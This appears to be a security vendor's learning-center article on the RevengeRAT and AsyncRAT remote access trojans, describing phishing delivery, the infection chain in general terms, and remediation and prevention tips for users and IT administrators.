Let's Talk

Learning Center

Learning objectives

After reading this article you will be able to:

  • Technical information and threat behavior
  • Keeping 

The Backdoor RAT and loader evasion techniques

The cybersecurity threat landscape has to deal with malware such as RAT (Remote Access Trojan). It is a backdoor threat apart from launching attacks from remote locations. The technique used is obfuscation, weaponization of benign files, encryption, and remote execution. 

One of the new backdoor RATS detected by Microsoft is the AsyncRAT. This malware has no aliases name and is similar to the RevengeRAT, also known as Revenge. 

The Revenge RAT is malware and is known to attack and infect devices through malicious ads on compromised websites and malicious attachments on email. The malware is sent as a Visual Basic script with a .rar or .zip, or .doc files through spear-phishing attacks. The attackers used emails or links with embedded images that redirect users to cloud hosting sites like OneDrive, iCloud Drive, and Google Drive, where malware resides. 

How is it tackled? 

The Microsoft Defender Antivirus software removes this threat automatically the moment it detects it. If a user has cloud-delivered cybersecurity solutions, one can rest assured that the device is well-equipped with the latest defense against unknown and new malware. If one does not have it, anti-malware software should be updated, and a full scan is run to rule out any threat. 

If a threat is detected, then one can take a few prevented measures to reduce the impact:

  • If a device is affected, then it should be immediately isolated as there are high chances that the malicious code has been launched into the system, and the device is under the control of the attacker.
  • The accounts used on the affected device are also compromised. One can either deactivate those accounts or reset the passwords.
  • Investigation of the endpoints infected needs to be thoroughly done to understand how the malware came in. One also needs to check the email and web traffic. 
  • Scrutinizing the timeline of the device will provide indications of lateral movement activities used on one of those compromised accounts. 
  • One needs to check for tools dropped inside the devices. These tools gain access to the credentials or enable lateral movement or any other type of attack.
  • Technical information and threat behavior

    Multiple operators use the RevengeRat malware. The malware family shares behavior and codes similarity apart from TTP (tactics, techniques, procedures) with other RAT malware available publicly like AsyncRAT, LimeRAT, Netwire, QuasarRAT, Cybergate, ClipBanker, Vjw0rm, WSHRat, and many other unnamed ones. 

    Process of attack 

    The moment a user downloads a Visual basic script, the wscript.exe process gets launched, followed by PowerShell script launch, which connects to a site called Pastebin. A second stage script known as SysTray.PS is downloaded. This script is known to create an additional process that ensures that it perseveres, collects the targeted data, then connects back to the attacker command control server. The exfiltrated data from the victim device gets transferred to the remote attacker server. 

    How to prevent malware infections on your device?

    Tips for End users

    • One should keep the popular software such as web browsers, Microsoft Office, Adobe Flash Player, and Java up the software to date to patch up any vulnerabilities. The Windows latest versions allow automatic updates. 
  • Avoid suspicious emails and other messaging tools. Links and attachments contain malware, and if clicked, it breaks into the system. For example, Microsoft Office 365 has inbuilt link protection, spam filtering, and anti-malware.
  • Watch out for malicious websites and avoid visiting them as the sites can affect one device. One checks whether the website is harmful or not by checking the domain name which represents the company. If there are any misspellings, then one needs to be alert. Many malicious websites swap an original website name with a letter O with zero (0) or L with l with 1(one). 

    • If the genuine website name is Article.com and spelled as Artic1e.com, the site is suspect and needs to be avoided. 
  • Sites that pop up aggressively and constantly trick the users into clicking it and falling prey to the attack. 
  • Avoid using pirated content as it is not only illegal but also exposed to malware.
  • Downloading any music, app, or movies should be through official websites and app stores.
  • Avoid attaching any flash drives or removable drives to one’s device from unknown sources. Malware infiltrates the device from these drives. 
  • Use a non-administrator account. In the event of any malware launching into the system, it will run under the same privileges as the active user. If it is from an administrator, then the privileges are unlimited and give a free run to the malware. If it is otherwise, then the privileges are restricted, and the damage gets contained. 
  • Tips for Organization IT administrators 

    It is significant to have the latest operating system and application software. One is advised not to use versions earlier than Windows 10. Turning on automatic updates helps to deploy the latest security patch the moment they are available.

    Keeping  

    Effective anti-virus software will raise an alert if it detects any threat on the device. The threat is removed immediately on detection. It will quarantine the malware. 

    We’re remote friendly, with office in Miami: Miami

    Get the latest news, invites to events, and threat alerts